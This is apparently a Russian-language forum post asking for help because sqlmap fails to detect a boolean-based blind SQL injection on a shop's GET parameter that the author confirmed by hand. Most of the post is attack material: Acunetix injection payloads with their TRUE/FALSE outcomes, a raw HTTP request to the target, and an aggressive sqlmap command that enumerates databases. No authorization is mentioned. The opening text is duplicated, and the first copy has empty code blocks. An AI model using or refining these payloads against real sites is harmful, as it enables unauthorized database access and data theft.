Суть проблемы:
Ребят, всем привет. Столкнулся с проблемой в использовании sqlmap.
Sqlmap не видит injection. Хотя сам пробовал руками через Burp Suite, она там есть.
Как по результату сканирования Acunetix, я пришел к выводу что это Boolean-based blind.
Проберка Burp Suite:
Через Burp Suite пробовал тестить данную уязвимость, была следующая картина:
В тех payload, где Acunetix выдавал TRUE ---> показывался контент на странице, FALSE ---> контента соответственно не было.
Выходные данные Acunetix:
URL:
Acunetix показал следующее:
URL encoded GET input j9 was set to Name Product' AND 3*3*9<(2*4) AND '0001yMq'='0001yMq
Tests performed:
Request:
Использование Sqlmap:
Буду рад помощи. Спасибо.
Ребят, всем привет. Столкнулся с проблемой в использовании sqlmap.
Sqlmap не видит injection. Хотя сам пробовал руками через Burp Suite, она там есть.
Как по результату сканирования Acunetix, я пришел к выводу что это Boolean-based blind.
Проберка Burp Suite:
Через Burp Suite пробовал тестить данную уязвимость, была следующая картина:
В тех payload, где Acunetix выдавал TRUE ---> показывался контент на странице, FALSE ---> контента соответственно не было.
Выходные данные Acunetix:
URL:
Acunetix показал следующее:
URL encoded GET input j9 was set to Name Product' AND 3*3*9<(2*4) AND '0001yMq'='0001yMq
Tests performed:
- Name Product' AND 2*3*8=6*8 AND '0001yMq'='0001yMq => TRUE
- Name Product' AND 2*3*8=6*9 AND '0001yMq'='0001yMq => FALSE
- Name Product' AND 3*3<(2*4) AND '0001yMq'='0001yMq => FALSE
- Name Product' AND 3*2>(1*5) AND '0001yMq'='0001yMq => TRUE
- Name Product' AND 3*2*0>=0 AND '0001yMq'='0001yMq => TRUE
- Name Product' AND 3*3*9<(2*4) AND '0001yMq'='0001yMq => FALSE
Request:
Код:
GET /name.php?j9=Name%20Product'%20AND%203*3*9<(2*4)%20AND%20'0001yMq'='0001yMq&j10=Name%20Product%20Thread/%20Name&ggg=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: name-shop.com
Connection: Keep-alive
Использование Sqlmap:
Код:
sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs
Буду рад помощи. Спасибо.